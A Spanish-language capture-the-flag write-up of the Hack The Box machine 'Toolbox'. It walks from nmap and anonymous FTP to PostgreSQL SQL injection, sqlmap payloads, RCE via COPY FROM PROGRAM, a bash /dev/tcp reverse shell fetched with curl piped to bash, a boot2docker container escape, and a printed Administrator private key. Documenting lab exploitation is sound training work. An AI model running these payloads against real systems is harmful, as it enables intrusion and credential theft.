Entrada

Toolbox

Toolbox

Skills

  • PostgreSQL Injection (RCE)
  • Abusing boot2docker [Docker-Toolbox]
  • Pivoting

Certificaciones

  • eJPT
  • OSCP (Intrusión)
  • eWPT
  • eCPPTv2

Descripción

Toolbox es una máquina easy windows, encontramos una SQLI (SQL Injection) en el panel login a través de la cual obtenemos un RCE (Remote Command Execution) que nos permite acceder a un contenedor. Obtenemos la id_rsa del usuario Administrator abusando del boot2docker y obtenemos acceso a la máquina víctima


Reconocimiento

Se comprueba que la máquina está activa y se determina su sistema operativo, el ttl de las máquinas windows suele ser 128, en este caso hay un nodo intermediario que hace que el ttl disminuya en una unidad

1
2
3
4
5
6
7
8
9
# ping 10.129.189.200
PING 10.129.189.200 (10.129.189.200) 56(84) bytes of data.
64 bytes from 10.129.189.200: icmp_seq=1 ttl=127 time=87.2 ms
64 bytes from 10.129.189.200: icmp_seq=2 ttl=127 time=119 ms
64 bytes from 10.129.189.200: icmp_seq=3 ttl=127 time=84.6 ms
^C
--- 10.129.189.200 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 84.551/96.996/119.227/15.757 ms

Nmap

Se va a realizar un escaneo de todos los puertos abiertos en el protocolo TCP a través de nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# sudo nmap -p- --open --min-rate 5000 -sS -n -Pn -v 10.129.189.200 -oG openPorts 
[sudo] password for justice-reaper: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-29 00:15 CEST
Initiating SYN Stealth Scan at 00:15
Scanning 10.129.189.200 [65535 ports]
Discovered open port 21/tcp on 10.129.189.200
Discovered open port 22/tcp on 10.129.189.200
Discovered open port 443/tcp on 10.129.189.200
Discovered open port 139/tcp on 10.129.189.200
Discovered open port 135/tcp on 10.129.189.200
Discovered open port 445/tcp on 10.129.189.200
Discovered open port 49669/tcp on 10.129.189.200
Discovered open port 49664/tcp on 10.129.189.200
Discovered open port 49666/tcp on 10.129.189.200
Discovered open port 49665/tcp on 10.129.189.200
Discovered open port 49668/tcp on 10.129.189.200
Discovered open port 5985/tcp on 10.129.189.200
Discovered open port 47001/tcp on 10.129.189.200
Discovered open port 49667/tcp on 10.129.189.200
Completed SYN Stealth Scan at 00:15, 14.96s elapsed (65535 total ports)
Nmap scan report for 10.129.189.200
Host is up (0.068s latency).
Not shown: 63779 closed tcp ports (reset), 1742 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.07 seconds
           Raw packets sent: 74462 (3.276MB) | Rcvd: 67994 (2.720MB)

Se procede a realizar un análisis de detección de servicios y la identificación de versiones utilizando los puertos abiertos encontrados

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# nmap -sCV -p 21,22,135,139,443,445,5985,47001,49664,49665,49666,49667,49668,49669 10.129.189.200 -oN services
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-29 00:16 CEST
Nmap scan report for 10.129.189.200
Host is up (0.15s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 5b:1a:a1:81:99:ea:f7:96:02:19:2e:6e:97:04:5a:3f (RSA)
|   256 a2:4b:5a:c7:0f:f3:99:a1:3a:ca:7d:54:28:76:b2:dd (ECDSA)
|_  256 ea:08:96:60:23:e2:f4:4f:8d:05:b3:18:41:35:23:39 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.38 ((Debian))
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.38 (Debian)
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd/stateOrProvinceName=Some-State/countryName=GR
| Not valid before: 2020-02-18T17:45:56
|_Not valid after:  2021-02-17T17:45:56
|_http-title: MegaLogistics
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-28T22:17:38
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.36 seconds

Añadimos el dominio que se encuentra en los common names al /etc/hosts

1
2
3
4
5
6
7
8
127.0.0.1   localhost
127.0.1.1   Kali-Linux
10.129.189.200  megalogistic.com admin.megalogistic.com

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Otra forma sería examinar el certificado SSL de forma manual es la siguiente

1
# openssl s_client -connect 10.129.189.200:443   

FTP Enumeration

Nos conectamos con el usuario anonymous y me descargo este .exe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# ftp 10.129.189.200        
Connected to 10.129.189.200.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (10.129.189.200:justice-reaper): anonymous
331 Password required for anonymous
Password: 
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||64945|)
150 Opening data channel for directory listing of "/"
-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
226 Successfully transferred "/"
ftp> get docker-toolbox.exe
local: docker-toolbox.exe remote: docker-toolbox.exe
229 Entering Extended Passive Mode (|||49339|)
150 Opening data channel for file download from server of "/docker-toolbox.exe"
100% |******************************************************************************************************************************************|   231 MiB  506.93 KiB/s    00:00 ETA
226 Successfully transferred "/docker-toolbox.exe"
242520560 bytes received in 07:47 (506.93 KiB/s)

Web Enumeration

Al acceder a https://admin.megalogistic.com/ vemos un panel de autenticación

Si accedemos a https://megalogistic.com/ vemos lo siguiente

Web Exploitation

He probado esta inyección sql en el panel de login y ha funcionado

Hemos ganado acceso al panel admnistrativo

Debido a que en el panel administrativo no he visto nada interesante, voy a usar sqlmap para que me enumere las bases de datos

1
2
3
4
5
# sqlmap -u https://admin.megalogistic.com/ --risk=3 --level=5 --random-agent --dbs --batch --data "username=*&password=*" 

[*] information_schema
[*] pg_catalog
[*] public

Sqlmap ha identificado estos tipos de inyecciones sql

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=-3463' OR 6802=6802-- qZyo&password=

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: username=' AND 5733=CAST((CHR(113)||CHR(122)||CHR(113)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (5733=5733) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(120)||CHR(98)||CHR(113)) AS NUMERIC)-- nWHD&password=

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: username=';SELECT PG_SLEEP(5)--&password=

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: username=' AND 2020=(SELECT 2020 FROM PG_SLEEP(5))-- rxkb&password=

En la base de datos public he encontrado las credenciales del usuario admin

1
2
3
4
5
6
7
# sqlmap -u https://admin.megalogistic.com/ --risk=3 --level=5 --random-agent --dbs --batch --data "username=*&password=*" -D public -T users -C password,username --dump

+----------------------------------+----------+
| password                         | username |
+----------------------------------+----------+
| 4a100a85cb5ca3616dcf137918550815 | admin    |
+----------------------------------+----------+

Este es un hash MD5 y en https://hashes.com/en/decrypt/hash he podido obtener la contraseña usando rainbow tables

1
4a100a85cb5ca3616dcf137918550815:iamzeadmin

Con sqlmap he listado el usuario en uso

1
2
3
# sqlmap -u https://admin.megalogistic.com/ --risk=3 --level=5 --random-agent --batch --data "username=*&password=*" --current-user      

current user: 'postgres'

He listado los privilegios que tengo

1
2
3
4
5
6
# sqlmap -u https://admin.megalogistic.com/ --risk=3 --level=5 --random-agent --batch --data "username=*&password=*" --privileges     

database management system users privileges:
[*] postgres (administrator) [2]:
    privilege: createdb
    privilege: super

He intentado reutilizar esta contraseña para conectarme a los diferentes servicios pero no ha funcionado, he encontrado este artículo https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql#rce-to-program que dice que podemos ejecutar comandos si somos super usuarios o pertenecemos al grupo pg_execute_server_program. En nuestro caso somos tenemos el privilegio super así que podríamos derivar la SQLI a un RCE, lo primero que debemos hacer es abrir el Burpsuite y crear la tabla (es muy importante cerrar la query anterior con el ; debido a que estamos en PostgreSQL)

1
username=test'; CREATE TABLE cmd_exec(cmd_output text);-- - &password=test

He probado comandos de linux y de windows, cuando uso comandos de linux no da error pero cuando uso comandos de windows si que da error, lo que significaría que estamos ejecutando comandos en el docker

1
username=test';COPY+cmd_exec+FROM+PROGRAM+'which curl';--+-+&password=test

Intrusión

Vamos a crearos un archivo llamado shell con este contenido en su interior

1
bash -i >& /dev/tcp/10.10.16.16/9993 0>&1

En el mismo directorio donde nos hemos creado este archivo nos vamos a montar un servidor http

1
# python -m http.server 80

Nos ponemos en escucha con netcat por el puerto 9993

1
# nc -nlvp 9993

Nos mandamos un shell a nuestro equipo

1
username=test';COPY+cmd_exec+FROM+PROGRAM+'curl http://10.10.16.16/shell|bash';--+-+&password=test

Recibimos la shell

1
2
3
4
5
6
# nc -nlvp 9993 
listening on [any] 9993 ...
connect to [10.10.16.16] from (UNKNOWN) [10.129.189.200] 62842
bash: cannot set terminal process group (11767): Inappropriate ioctl for device
bash: no job control in this shell
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ 

Obtenemos las dimensiones de nuestra pantalla

1
2
# stty size
45 183

Efectuamos el tratamiento a la TTY

1
2
3
4
5
6
7
8
9
10
11
12
13
# script /dev/null -c bash
[ENTER]
[CTRL + Z]
# stty raw -echo; fg
[ENTER]
# reset xterm
[ENTER]
# export TERM=xterm
[ENTER]
# export SHELL=bash
[ENTER]
# stty rows 45 columns 183
[ENTER]

Privilege Escalation

Nos encontramos en el contenedor

1
2
3
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ hostname -I
hostname -I
172.17.0.2 

Enumeramos el contenedor y vemos que el sistema es boot2docker

1
2
3
4
5
6
7
8
9
10
postgres@bc56e3cc55e9:/boot$ uname -a
uname -a
Linux bc56e3cc55e9 4.14.154-boot2docker #1 SMP Thu Nov 14 19:19:08 UTC 2019 x86_64 GNU/Linux
postgres@bc56e3cc55e9:/boot$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID:	Debian
Description:	Debian GNU/Linux 10 (buster)
Release:	10
Codename:	buster

Escapamos del contenedor siguiendo estos pasos https://rioasmara.com/2021/08/08/privilege-escalation-boot2docker/

1
2
3
4
5
6
7
8
9
10
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ssh -t docker@172.17.0.1
docker@172.17.0.1's password: 
   ( '>')
  /) TC (\   Core is distributed with ABSOLUTELY NO WARRANTY.
 (/-_--_-\)           www.tinycorelinux.net

docker@box:~$ whoami
docker
docker@box:~$ hostname -i                                                      
127.0.0.1

Nos convertimos en usuario root

1
2
3
4
5
6
-bash-4.4$ sudo -l
User docker may run the following commands on this host:
    (root) NOPASSWD: ALL
-bash-4.4$ sudo su
bash-4.4# whoami
root

He logrado encontrar una clave id_rsa que estaba oculta en el directorio Administrator

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
bash-4.4# ls -a
.             etc           linuxrc       run           usr
..            home          mnt           sbin          var
bin           init          opt           squashfs.tgz
c             lib           proc          sys
dev           lib64         root          tmp
bash-4.4# cd c
bash-4.4# ls -a
.      ..     Users
bash-4.4# cd Users
bash-4.4# ls -a
.              Administrator  Default        Public         desktop.ini
..             All Users      Default User   Tony
bash-4.4# cd Administrator
bash-4.4# ls -la
total 1465
drwxrwxrwx    1 docker   staff         8192 Feb  8  2021 .
dr-xr-xr-x    1 docker   staff         4096 Feb 19  2020 ..
drwxrwxrwx    1 docker   staff         4096 Jul 28 22:08 .VirtualBox
drwxrwxrwx    1 docker   staff            0 Feb 18  2020 .docker
drwxrwxrwx    1 docker   staff         4096 Feb 19  2020 .ssh
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 3D Objects
drwxrwxrwx    1 docker   staff            0 Feb 18  2020 AppData
drwxrwxrwx    1 docker   staff            0 Feb 19  2020 Application Data
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Contacts
drwxrwxrwx    1 docker   staff            0 Sep 15  2018 Cookies
dr-xr-xr-x    1 docker   staff            0 Feb  8  2021 Desktop
dr-xr-xr-x    1 docker   staff         4096 Feb 19  2020 Documents
dr-xr-xr-x    1 docker   staff            0 Apr  5  2021 Downloads
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Favorites
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Links
drwxrwxrwx    1 docker   staff         4096 Feb 18  2020 Local Settings
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Music
dr-xr-xr-x    1 docker   staff         4096 Feb 19  2020 My Documents
-rwxrwxrwx    1 docker   staff       262144 Jan 11  2022 NTUSER.DAT
-rwxrwxrwx    1 docker   staff        65536 Feb 18  2020 NTUSER.DAT{1651d10a-52b3-11ea-b3e9-000c29d8029c}.TM.blf
-rwxrwxrwx    1 docker   staff       524288 Feb 18  2020 NTUSER.DAT{1651d10a-52b3-11ea-b3e9-000c29d8029c}.TMContainer00000000000000000001.regtrans-ms
-rwxrwxrwx    1 docker   staff       524288 Feb 18  2020 NTUSER.DAT{1651d10a-52b3-11ea-b3e9-000c29d8029c}.TMContainer00000000000000000002.regtrans-ms
drwxrwxrwx    1 docker   staff            0 Sep 15  2018 NetHood
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Pictures
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Recent
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Saved Games
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Searches
dr-xr-xr-x    1 docker   staff            0 Sep 15  2018 SendTo
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Start Menu
drwxrwxrwx    1 docker   staff            0 Sep 15  2018 Templates
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Videos
-rwxrwxrwx    1 docker   staff        24576 Feb 18  2020 ntuser.dat.LOG1
-rwxrwxrwx    1 docker   staff        65536 Feb 18  2020 ntuser.dat.LOG2
-rwxrwxrwx    1 docker   staff           20 Feb 18  2020 ntuser.ini
bash-4.4# cd .ssh
bash-4.4# ls -a
.                authorized_keys  id_rsa.pub
..               id_rsa           known_hosts
bash-4.4# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAvo4SLlg/dkStA4jDUNxgF8kbNAF+6IYLNOOCeppfjz6RSOQv
Md08abGynhKMzsiiVCeJoj9L8GfSXGZIfsAIWXn9nyNaDdApoF7Mfm1KItgO+W9m
M7lArs4zgBzMGQleIskQvWTcKrQNdCDj9JxNIbhYLhJXgro+u5dW6EcYzq2MSORm
7A+eXfmPvdr4hE0wNUIwx2oOPr2duBfmxuhL8mZQWu5U1+Ipe2Nv4fAUYhKGTWHj
4ocjUwG9XcU0iI4pcHT3nXPKmGjoPyiPzpa5WdiJ8QpME398Nne4mnxOboWTp3jG
aJ1GunZCyic0iSwemcBJiNyfZChTipWmBMK88wIDAQABAoIBAH7PEuBOj+UHrM+G
Stxb24LYrUa9nBPnaDvJD4LBishLzelhGNspLFP2EjTJiXTu5b/1E82qK8IPhVlC
JApdhvDsktA9eWdp2NnFXHbiCg0IFWb/MFdJd/ccd/9Qqq4aos+pWH+BSFcOvUlD
vg+BmH7RK7V1NVFk2eyCuS4YajTW+VEwD3uBAl5ErXuKa2VP6HMKPDLPvOGgBf9c
l0l2v75cGjiK02xVu3aFyKf3d7t/GJBgu4zekPKVsiuSA+22ZVcTi653Tum1WUqG
MjuYDIaKmIt9QTn81H5jAQG6CMLlB1LZGoOJuuLhtZ4qW9fU36HpuAzUbG0E/Fq9
jLgX0aECgYEA4if4borc0Y6xFJxuPbwGZeovUExwYzlDvNDF4/Vbqnb/Zm7rTW/m
YPYgEx/p15rBh0pmxkUUybyVjkqHQFKRgu5FSb9IVGKtzNCtfyxDgsOm8DBUvFvo
qgieIC1S7sj78CYw1stPNWS9lclTbbMyqQVjLUvOAULm03ew3KtkURECgYEA17Nr
Ejcb6JWBnoGyL/yEG44h3fHAUOHpVjEeNkXiBIdQEKcroW9WZY9YlKVU/pIPhJ+S
7s++kIu014H+E2SV3qgHknqwNIzTWXbmqnclI/DSqWs19BJlD0/YUcFnpkFG08Xu
iWNSUKGb0R7zhUTZ136+Pn9TEGUXQMmBCEOJLcMCgYBj9bTJ71iwyzgb2xSi9sOB
MmRdQpv+T2ZQQ5rkKiOtEdHLTcV1Qbt7Ke59ZYKvSHi3urv4cLpCfLdB4FEtrhEg
5P39Ha3zlnYpbCbzafYhCydzTHl3k8wfs5VotX/NiUpKGCdIGS7Wc8OUPBtDBoyi
xn3SnIneZtqtp16l+p9pcQKBgAg1Xbe9vSQmvF4J1XwaAfUCfatyjb0GO9j52Yp7
MlS1yYg4tGJaWFFZGSfe+tMNP+XuJKtN4JSjnGgvHDoks8dbYZ5jaN03Frvq2HBY
RGOPwJSN7emx4YKpqTPDRmx/Q3C/sYos628CF2nn4aCKtDeNLTQ3qDORhUcD5BMq
bsf9AoGBAIWYKT0wMlOWForD39SEN3hqP3hkGeAmbIdZXFnUzRioKb4KZ42sVy5B
q3CKhoCDk8N+97jYJhPXdIWqtJPoOfPj6BtjxQEBoacW923tOblPeYkI9biVUyIp
BYxKDs3rNUsW1UUHAvBh0OYs+v/X+Z/2KVLLeClznDJWh/PNqF5I
-----END RSA PRIVATE KEY-----

Nos creamos un archivo llamado id_rsa y le añadimos el privilegio 600 con chmod, una vez hecho eso nos conectamos usando esta id_rsa a la máquina víctima

1
2
3
4
5
6
7
# ssh -i id_rsa administrator@10.129.189.200

Microsoft Windows [Version 10.0.17763.1039]
(c) 2018 Microsoft Corporation. All rights reserved.

administrator@TOOLBOX C:\Users\Administrator>whoami
toolbox\administrator

Flags

Desde el contenedor ya podemos obtener ambas flags pero la idea sería ganar acceso a la máquina windows tal y como lo hemos hecho anteriormente

1
2
3
4
5
bash-4.4# find / -name user.txt 2>/dev/null
/mnt/sda1/var/lib/docker/overlay2/07623502c61c6209351069a7c272a5514f193c50302d83ead62325346bf41d06/merged/var/lib/postgresql/user.txt
/mnt/sda1/var/lib/docker/overlay2/20aed3bef7110c6e08a7fc7f476fcdf690589baabf19f49b462b7395724731d2/diff/var/lib/postgresql/user.txt
bash-4.4# find / -name root.txt 2>/dev/null
/c/Users/Administrator/Desktop/root.txt
Esta entrada está licenciada bajo CC BY 4.0 por el autor.